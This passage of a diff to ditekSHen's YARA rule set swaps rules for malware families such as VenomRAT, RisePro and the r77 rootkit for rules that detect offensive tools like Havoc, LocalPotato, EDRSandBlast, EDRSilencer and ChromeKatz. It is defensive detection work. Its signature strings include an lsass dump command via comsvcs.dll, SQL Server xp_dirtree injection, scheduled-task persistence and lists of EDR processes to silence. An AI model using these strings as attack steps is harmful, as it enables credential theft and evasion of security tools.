-		$s10 = "Disable_Regis" fullword ascii
-		$s11 = "RecordedClips" fullword ascii
-		$s12 = "HoneyPotStatus" fullword ascii
+		$s1 = "process PID:" fullword wide
+		$s2 = "Dump file created:" fullword wide
+		$s3 = "System.Security.AccessControl.FileSystemAccessRule('Everyone', 'FullControl', 'Allow')" ascii
+		$s4 = "{[math]::Round($_.PrivateMemorySize64" ascii
+		$s5 = "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump $" ascii
+		$s6 = "\"payload\":{\"logins\":" ascii
+		$s7 = "\\pandora.pdb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of ( $s* ) ) or 9 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_MALWARE_Win_Whiffyrecon : FILE
+
+rule DITEKSHEN_INDICATOR_TOOL_Havoc : FILE
 {
 	meta:
-		description = "Detects Whiffy Recon"
+		description = "Detects Havoc Demon"
 		author = "ditekSHen"
-		id = "19b0f327-06ee-5f78-abac-9c4fbcad98ac"
+		id = "71ad145c-4017-597a-837e-5d11ba64d7c0"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11032-L11052"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1693-L1710"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "58df9f47f5890c5e31d352be682c6164a940dad206ad29c54c43f70d3afb9543"
+		logic_hash = "c5806deaa57590ebe1923608b9b085460e0edd024721e6e9d7073765a79bf22b"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "WLANSVC" fullword wide
-		$s2 = "f02fe1c0-137a-4802-8881-55dd300c5022" fullword wide
-		$s3 = "\\wlan.lnk" fullword wide
-		$s4 = "str-12.bin" wide
-		$s5 = "/geolocation/v1/geolocate?key=" wide
-		$s6 = "/wlan" fullword wide
-		$s7 = "/scanned" fullword wide
-		$s8 = "/bots/" fullword wide
-		$s9 = "wlan.pdb" fullword ascii
-		$s10 = "botId" fullword ascii
-		$s11 = "wifiAccessPoints" fullword ascii
-		$s12 = "considerIp" fullword ascii
-		$s13 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" fullword wide
+		$x1 = "X-Havoc:" wide
+		$x2 = "X-Havoc-Agent:" wide
+		$s1 = "\\Werfault.exe" wide
+		$s2 = "/funny_cat.gif" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 3 of them or ( pe.number_of_imports == 0 and pe.number_of_exports == 0 and 2 of them ) )
 }
-rule DITEKSHEN_MALWARE_Win_Quiterat : FILE
+rule DITEKSHEN_INDICATOR_TOOLS_Localpotato : FILE
 {
 	meta:
-		description = "Detects QuiteRAT"
-		author = "ditekSHen"
-		id = "54f7b899-3418-5074-8138-38cf073cda8c"
+		description = "Detects LocalPotato"
+		author = "ditekShen"
+		id = "65f8305b-b830-58e7-970b-da1df9a06e9b"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11054-L11068"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1712-L1743"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "257f9151294254e3e86979f184963f0396587438393b11bad068ba0f386cfc4a"
+		logic_hash = "88fba16a6eec6d2c23331642041c6adfddddeb21ba8e74b6959bd48c90f73cbb"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$x1 = "< No Pineapple! >" ascii
-		$x2 = ".?AVPineapple" ascii
-		$x3 = ".?AVApple@@" ascii
-		$s1 = "XgsdCwsRFxZF" ascii
-		$s2 = "XggZChkVRQ==" ascii
-		$s3 = "RxUZERQRHEU=" ascii
-		$s4 = "XhkbDBEXFkU" ascii
+		$x1 = "LocalPotato.stg" fullword wide
+		$x2 = "we always love potatoes" fullword ascii
+		$s1 = "{00000306-0000-0000-c000-000000000046}" wide
+		$s2 = "{854A20FB-2D44-457D-992F-EF13785D2B51}" wide
+		$s3 = "cifs/127.0.0.1" wide
+		$s4 = "\\\\127.0.0.1\\c$" wide
+		$s5 = "complete failed: 0x%08x" ascii
+		$s6 = "Authorization: NTLM %s" ascii
+		$s7 = "Objref Moniker Display Name = %S" ascii
+		$s8 = "SMB Connect Tree: %S" ascii
+		$s9 = "b64type=%s" fullword ascii
+		$s10 = "decodes=%s" fullword ascii
+		$s11 = { 53 4d 42 72 00 00 00 00 18 01 48 00 00 00 00 00
+               00 00 00 00 00 00 00 ff ff ac 7b 00 00 00 00 00
+               22 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00 02 53
+               4d 42 20 32 2e 30 30 32 00 02 53 4d 42 20 32 2e
+               3f 3f 3f 00 00 00 00 00 00 00 00 00 00 00 68 fe
+               53 4d 42 40 }
+		$o1 = { 44 8b 4c 24 34 48 8d 44 24 38 48 89 44 24 28 4c }
+		$o2 = { e8 c4 ff ff ff 33 d2 48 8d 4d f0 41 b8 d0 04 00 }
+		$o3 = { 83 7b 0c 00 75 42 8b 03 25 ff ff ff 1f 3d 21 05 }
+		$o4 = { 3c 68 74 6c 3c 6a 74 5c 3c 6c 74 34 3c 74 74 24 }
+		$o5 = { e9 39 ff ff ff cc 48 89 5c 24 08 4c 89 4c 24 20 }
+		$o6 = { 48 b9 ff ff ff ff ff ff 0f 00 48 8b c2 41 b8 0c }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( all of ( $x* ) and 1 of ( $s* ) ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 5 of ( $s* ) ) or 8 of ( $s* ) or ( 4 of ( $o* ) and ( 1 of ( $x* ) or 5 of ( $s* ) ) ) )
 }
-rule DITEKSHEN_MALWARE_PWSH_CUMII
+rule DITEKSHEN_INDICATOR_TOOLS_Edrsandblast : FILE
 {
 	meta:
-		description = "Detects multi-dropper PowerShell"
-		author = "ditekSHen"
-		id = "07b77251-1d79-5521-8c05-ecfc662f45cb"
+		description = "Detects EDRSandBlast"
+		author = "ditekShen"
+		id = "85d6d82b-a30e-5c79-93e7-8a3bbbf4a403"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11070-L11086"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1745-L1767"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ab9e59b0552718928d170a988d129b38352700076847f2f409976016858864eb"
+		logic_hash = "9b801f053e42fbd646cf62fecf6cbf5f2cceeec82bed93ecd8625984eccb08c6"
 		score = 75
 		quality = 75
-		tags = ""
-		clamav = "ditekSHen.MALWARE.PWSH.CUMII"
+		tags = "FILE"
 
 	strings:
-		$s1 = ".('{1}{$}'.replace('$','0')" ascii nocase
-		$s2 = ",'I').replace('!','ex')" ascii nocase
-		$s3 = "'.replace('*','0001')" ascii nocase
-		$s4 = "Remove-Item $" ascii nocase
-		$s5 = "the File will start cumiing" ascii nocase
-		$b1 = "011001100111010101101110011*" ascii
-		$b2 = "0101001000*1110110*010011111" ascii
-		$b3 = "01001101010110101001*11*0000" ascii
+		$s1 = "credguard" fullword wide
+		$s2 = "\\cmd.exe" fullword wide
+		$s3 = "ci_%s.dll" fullword wide
+		$s4 = "cmd /c sc" wide
+		$s5 = "fltmgr_%s.sys" fullword wide
+		$s6 = "ntoskrnl_%s.exe" fullword wide
+		$s7 = "ProductDir" fullword wide
+		$s8 = "lsass.exe" fullword wide
+		$s9 = "0x%p;%ws;%ws;;;" ascii
+		$s10 = "MiniDumpWriteDump" ascii
+		$s11 = "EDRSB_Init: %u" ascii
+		$s12 = "ntoskrnloffsets.csv" fullword wide nocase
+		$s13 = "wdigestoffsets.csv" fullword wide nocase
+		$o1 = { eb 0e 8b 85 34 15 00 00 ff c0 89 85 34 15 00 00 }
+		$o2 = { 74 48 8b 85 34 15 00 00 41 b9 04 01 00 00 4c 8d }
 
 	condition:
-		(3 of ( $s* ) and 1 of ( $b* ) )
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-rule DITEKSHEN_MALWARE_Win_Agnianestealer : FILE
+rule DITEKSHEN_INDICATOR_TOOLS_Rsockstun : FILE
 {
 	meta:
-		description = "Detects Agniane infostealer"
-		author = "ditekSHen"
-		id = "fcbbf748-dc01-579f-a6f8-37e0f3dea35e"
+		description = "Detects rsockstun"
+		author = "ditekShen"
+		id = "a284a607-abea-5914-ad3a-84eaff733ee0"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11088-L11114"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1769-L1781"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0031fbe6d76868819cbcfc638433d60a50e8f5cfd14ff25af88ed3dffefd7d62"
+		logic_hash = "4ad0ac389bf8961b0dd987a72d5dd534e5e3cc673f0e07aa49d39d1fd3f5f53e"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
-		snort = "923828001"
-		clamav = "ditekSHen.MALWARE.Win.AgnianeStealer"
 
 	strings:
-		$x1 = "Agniane.pdb" ascii
-		$x2 = "IEnumerable<Agniane.Classes.LogRecord>." ascii
-		$x3 = "Agniane Stealer" wide
-		$x4 = "cinoshibot" wide
-		$x5 = "yqbiguuno2zp5jxsmqbev4rwckvy27bqws5cgm3hiid7xolt65j72kqd.onion" wide
-		$s1 = "<Pass encoding=\"base64\">" wide
-		$s2 = "Domain Detect: detected {0}" wide
-		$s3 = "DOMAINDETECTCOOKIES" ascii
-		$s4 = /(Opera|Edge|Chrome|Brave|Vivaldi|Blink|Universal|Gecko|OperaGx|Firefox)Grabber/ fullword ascii
-		$u1 = "/antivm.php?id=" wide
-		$u2 = "/ferr.php?id=" wide
-		$u3 = ".php?ownerid=" wide
-		$u4 = "&buildid=" wide
-		$u5 = "&username=" wide
-		$u6 = "&BSSID=" wide
-		$u7 = "&rndtoken=" wide
-		$u8 = "&domaindetects=" wide
+		$s1 = "main.connectviaproxy" ascii
+		$s2 = "main.connectForSocks" ascii
+		$s3 = "main.listenForClients" ascii
+		$s4 = "main.listenForSocks" ascii
+		$s5 = "Proxy-Authorization: NTLM TlRMTVNTUAABAAAABoIIAAAAAAAAAAAAAAAAAAAAAAA=" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and ( 2 of ( $s* ) or 3 of ( $u* ) ) ) or ( all of ( $s* ) and 3 of ( $u* ) ) or ( 7 of ( $u* ) ) )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and all of them
 }
-rule DITEKSHEN_MALWARE_Win_TOITOIN_Kritaloader : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Scmaldevinj_Go : FILE
 {
 	meta:
-		description = "Detects TOITOIN KritaLoader"
-		author = "ditekSHen"
-		id = "5ff002fc-1108-554e-9de6-92d568826d1d"
+		description = "Detects Go shell/malware dev injector"
+		author = "ditekShen"
+		id = "56ec114f-8e16-5ab6-ae3b-a182cb381b4a"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11116-L11127"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1783-L1793"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9629a4cfa606812d2579c0c0d486dec5971854e5133f0594a4638db5b89c3135"
+		logic_hash = "48c3c759283c63a0c439cfba0194da89f402189e4c3cd831c22b5078ccae47b1"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav = "ditekSHen.MALWARE.Win.Trojan.TOITOIN"
 
 	strings:
-		$p1 = ":\\Trabalho_2023\\OFF_2023\\" ascii
-		$p2 = "DLL_Start_OK.pdb" ascii
-		$s1 = "krita_main" fullword ascii
+		$s1 = "hooka/shellcode.go" ascii
+		$s2 = "/maldev\x09v" ascii
+		$s3 = "Binject/debug/pe." ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $p* ) and 1 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_Win_TOITOIN_Injectordll : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Reversessh_Go : FILE
 {
 	meta:
-		description = "Detects TOITOIN InjectorDLL"
-		author = "ditekSHen"
-		id = "40776e0a-29df-52ea-8486-35027ab31a1b"
+		description = "Detects golang reverse ssh tool"
+		author = "ditekShen"
+		id = "4fb671aa-ad42-5f7e-bd5a-c19f018088c9"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11129-L11141"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1795-L1804"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fc80c702305657ba1058ca7f55579d1d5254dd0f619c5f7fda7886a868b65c93"
+		logic_hash = "4f9899aacc09c7da05fb5d412cfe8e91ee0d8e922189a6f921410d73ae8b3a9c"
 		score = 75
-		quality = 25
+		quality = 75
 		tags = "FILE"
-		clamav = "ditekSHen.MALWARE.Win.Trojan.TOITOIN"
 
 	strings:
-		$p1 = ":\\Trabalho_2023\\OFF_2023\\" ascii
-		$p2 = "DLL_START_IN.pdb" ascii
-		$s1 = ".ini" fullword ascii
-		$s2 = "\\users\\Public\\Documents\\" fullword ascii
+		$s1 = "/reverse_ssh/" ascii
+		$s2 = "main.rsshService" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $p* ) and all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_Win_TOITOIN_Downloader : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Sharpghosttask : FILE
 {
 	meta:
-		description = "Detects TOITOIN Downloader"
+		description = "Detects SharpGhostTask"
 		author = "ditekSHen"
-		id = "0282ea26-e381-5c9a-9dad-c90246d8add0"
+		id = "84d71179-0cfd-5389-b6bd-92c292361b3c"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11143-L11154"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1806-L1817"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d7e5e99c9266ec144152c3d1066e0e1a862f48ded17fab8f504192ca48219826"
+		logic_hash = "3de8d9fe7804e208ff556b6bedbd80eebfda1a730626403418a555ad9fbbb820"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		clamav = "ditekSHen.MALWARE.Win.Trojan.TOITOIN"
 
 	strings:
-		$p1 = ":\\Trabalho_2023\\OFF_2023\\" ascii
-		$s1 = { 20 2f 63 20 22 [6-15] 63 00 6d 00 64 00 00 00 6f 00 70 00 65 00 6e }
-		$o1 = { 48 83 fa 10 72 34 48 8b 8d 10 ?? 00 00 48 ff c2 }
+		$x1 = "Ghosted" wide
+		$x2 = /--target(binary|task)/ fullword wide
+		$x3 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\T" wide nocase
+		$s4 = "__GhostTask|" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-rule DITEKSHEN_MALWARE_Win_Venomrat : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Krbrelay : FILE
 {
 	meta:
-		description = "Detects VenomRAT"
-		author = "ditekSHen"
-		id = "93cd5ae3-c222-51a2-bbb9-bdd3254006e5"
+		description = "Detects KrbRelay"
+		author = "ditekshen"
+		id = "c8baac8a-54f3-5f53-93f8-daabeaaaff44"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11156-L11170"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1819-L1836"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "47d343def76a323c66db4ba6fb1c0d119f45323f9b7f36695e4aeb7b070819d7"
+		logic_hash = "f76b585cd2d741eab9d91ffd5a34c38696ac573cba1a3752d21c4b8b6681ad7b"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "Venom RAT + HVNC" fullword ascii
-		$x2 = "Venom" fullword ascii
-		$x3 = "VenomByVenom" fullword wide
-		$s1 = "/c schtasks /create /f /sc onlogon /rl highest /tn \"" fullword wide
-		$s2 = "UmVjZWl2ZWQ" wide
-		$s3 = "Pac_ket" fullword wide
-		$s4 = "Po_ng" fullword wide
+		$s1 = "System.Collections.Generic.IEnumerable<System.IntPtr>.GetEnumerator" fullword ascii
+		$s2 = "System.Collections.Generic.IEnumerator<System.IntPtr>.get_Current" fullword ascii
+		$s3 = "GetProcessIdFromIPid" fullword ascii
+		$g1 = "hello.stg" fullword wide
+		$g2 = "DSInternals.Common" fullword ascii
+		$g3 = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_7b3eed059f4c3e41\\Amd64\\UNIDRV.DLL" fullword wide
+		$g4 = "C:\\Windows\\System32\\kernelbase.dll" fullword wide
+		$g5 = "get_UnsupportedSecretEncryptionType" fullword ascii
+		$g6 = "CoInitializeSecurity Error: 0x{0:X8}. Exploit will fail." fullword wide
+		$g7 = "AuthnSvc: {0} - PrincName: {1}" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) and 2 of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and ( ( all of ( $s* ) and 4 of ( $g* ) ) or ( 7 of them ) )
 }
-rule DITEKSHEN_MALWARE_Win_Sapphirestealer : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Edrsilencer : FILE
 {
 	meta:
-		description = "Detects SapphireStealer"
-		author = "ditekSHen"
-		id = "ed6cffe4-23f1-5791-b07d-75abb698c899"
+		description = "Detects EDRSilencer"
+		author = "ditekshen"
+		id = "29b6da1e-9138-5ee6-b9fd-d7b3c7f48626"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11172-L11190"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1838-L1857"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "97088c0decf158d45a02571bd50b5f370c139339c19b8071f38c0f9816232d1f"
+		logic_hash = "da00aced2608fd5e192397ef2346ac247f29f993995fb90189e05da60be15d13"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "Sapphire.Modules." ascii
-		$s2 = "sapphire\\" wide
-		$s3 = "by r3vengerx0" wide
-		$s4 = "Sapphire\\obj\\" ascii
-		$s5 = "[ERROR_GETSECRETKEY_METHOD]" fullword wide
-		$s6 = "[ERROR_CANT_GET_PASSWORD]" fullword wide
-		$s7 = "<h2>------NEW LOGS------</h2>" wide
-		$s8 = "[ERROR] can't create grab directory" wide
-		$s9 = "<UploadToTelegram>d__" ascii
-		$s10 = "UploadToTelegram" ascii
-		$s11 = ".SendLog+<UploadToTelegram>d__" ascii
+		$s1 = "block \"C:\\Windows\\System32\\curl.exe\"" ascii
+		$s2 = "blockedr" fullword ascii
+		$s3 = "edrProcess" fullword ascii
+		$s4 = "BlockEdrProcessTraffic" fullword ascii
+		$s5 = "isInEdrProcessList" fullword ascii
+		$s6 = "EDRSilencer.c" fullword ascii
+		$v1 = "elastic-agent.exe" fullword ascii nocase
+		$v2 = "CybereasonAV.exe" fullword ascii nocase
+		$v3 = "SentinelAgent.exe" fullword ascii nocase
+		$v4 = "fortiedr.exe" fullword ascii nocase
+		$v5 = "MsMpEng.exe" fullword ascii nocase
+		$v6 = "CylanceSvc.exe" fullword ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and ( 4 of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $v* ) ) )
 }
-
-rule DITEKSHEN_MALWARE_Win_R77 : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Edrprison : FILE
 {
 	meta:
-		description = "Detects r77 rootkit"
-		author = "ditekSHen"
-		id = "813d207e-c6d9-5fea-8387-19da33bc3317"
+		description = "Detects EDRPrison"
+		author = "ditekshen"
+		id = "85831265-fd9e-5e0e-b5d9-22bf1c89b3f2"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11192-L11217"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1859-L1872"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e3ec6e88a3a77b7dc69eb51a528e6417f6b8695c7cb01d699cf248cebd9b84e2"
+		logic_hash = "e1ef9e9c6bd0d2efa7b0b617fb52100075658221559f92a61c672807ab5a4d77"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "startup" fullword wide
-		$s2 = "process_names" fullword wide
-		$s3 = "paths" fullword wide
-		$s4 = "service_names" fullword wide
-		$s5 = "tcp_local" fullword wide
-		$s6 = "tcp_remote" fullword wide
-		$s7 = "\\\\.\\pipe\\" wide
-		$s8 = "SOFTWARE\\" wide
+		$s1 = "Block:" wide
+		$s2 = "PacketLen:" wide
+		$s3 = "DoWorkPacket_Step" ascii
+		$s4 = "DoWorkAsyncNETWORK" ascii
+		$s5 = "BlockMessage" ascii
+		$s6 = "GetRmAddrPortNetwork" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( 5 of them and pe.exports ( "ReflectiveDllMain" ) ) or ( 5 of them and for any i in ( 0 .. pe.number_of_sections ) : ( ( pe.sections [ i ] . name == ".detourd" ) ) ) )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-rule DITEKSHEN_MALWARE_Win_Disco_Nightclub : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Sharpsqlpwn : FILE
 {
 	meta:
-		description = "Hunts for Disco NightClub"
-		author = "ditekSHen"
-		id = "79cbd351-e5d9-5f1f-8e73-71e0acca2707"
+		description = "Detects SharpSQLPwn"
+		author = "ditekshen"
+		id = "f99c0ddb-a073-5c15-9a7c-60f6766cd0a2"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11219-L11237"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1874-L1891"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ee0bd110ea1a3182284c4b3d6dd7eff48ca809a35a925147c716b18a88c0a233"
+		logic_hash = "c811d4926c433c6521f4bbe03a1abf4a5b27b56931a18a8bb672f37fe4fccfb8"
 		score = 75
-		quality = 51
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "\\OfficeBroker\\OfficeBroker.exe" ascii wide nocase
-		$s2 = "\\EDGEUPDATE\\EDGEAOUT" ascii wide nocase
-		$s3 = "\\EDGEUPDATE\\update" ascii wide nocase
-		$s4 = "windows.system.update.com" ascii wide nocase
-		$s5 = "edgeupdate-security-windows.com" ascii wide nocase
-		$s6 = "nightclub::" ascii wide nocase
-		$s7 = "EncryptedPasswordFlt" ascii wide nocase
-		$s8 = "Microsoft\\def\\Gfr45.cfg" ascii wide nocase
-		$s9 = "::keylog::" ascii wide nocase
-		$pdb1 = "\\AbcdMainProject\\Rootsrc\\Projects\\MainS\\Ink\\" ascii wide nocase
-		$pdb2 = "\\Autogen\\Kh\\AutogenAlg\\" ascii wide nocase
+		$s1 = "smb_ip" fullword ascii
+		$s2 = "Recon" fullword ascii
+		$s3 = "UNCPathInjection" fullword ascii
+		$s4 = "from sys.server_principals" wide
+		$s5 = "EXEC sp_configure '" wide
+		$s6 = "EXEC ('sp_configure" wide
+		$s7 = "CREATE ASSEMBLY" wide
+		$s8 = "DROP ASSEMBLY" wide
+		$s9 = "FROM 0x" wide
+		$s10 = "EXEC master..xp_dirtree \"\\\\" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $pdb* ) and 2 of ( $s* ) ) or ( 4 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-rule DITEKSHEN_MALWARE_Win_Risepro : FILE
+rule DITEKSHEN_INDICATOR_TOOL_Chromekatz : FILE
 {
 	meta:
-		description = "Detects RisePro infostealer"
-		author = "ditekShen"
-		id = "77bc8791-cbe8-53b5-86f4-bc918454a6a6"
+		description = "Detects ChromeKatz: CookieKatz and CredentialKatz"
+		author = "ditekshen"
+		id = "9dd706c8-552c-5c96-9b81-cfd50157ac34"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-25"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L11239-L11269"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1893-L1908"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f6f1832f316df51ca108a3c75034bd53c3823cd3d9b16da120e12e252dbf90ff"
+		logic_hash = "4f1bdbb7f8c4893444baac287c8fcefaca80a4301845706b56e9f9628c9f116f"
 		score = 75
-		quality = 46
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "t.me/riseprosupport" ascii wide nocase
-		$s1 = "failed readpacket" fullword wide
-		$s2 = "faield sendpacket" fullword wide
-		$s3 = "PersistWal" fullword wide
-		$s4 = /CRED_ENUMERATE_(ALL|SESSION)_CREDENTIALS/ fullword ascii
-		$s5 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36" fullword wide
-		$s6 = { 4c 00 6f 00 67 00 69 00 6e 00 20 00 44 00 61 00
-                74 00 61 [10] 57 00 65 00 62 00 20 00 44 00 61 00
-                74 00 61 [2] 48 00 69 00 73 00 74 00 6f 00 72 00
-                79 [21] 43 00 6f 00 6f 00 6b 00 69 00 65 00 73 }
-		$s7 = { 61 00 70 00 70 00 6c 00 69 00 63 00 61 00 74 00
-                69 00 6f 00 6e 00 2f 00 78 00 2d 00 77 00 77 00
-                77 00 2d 00 66 00 6f 00 72 00 6d 00 2d 00 75 00
-                72 00 6c 00 65 00 6e 00 63 00 6f 00 64 00 65 00
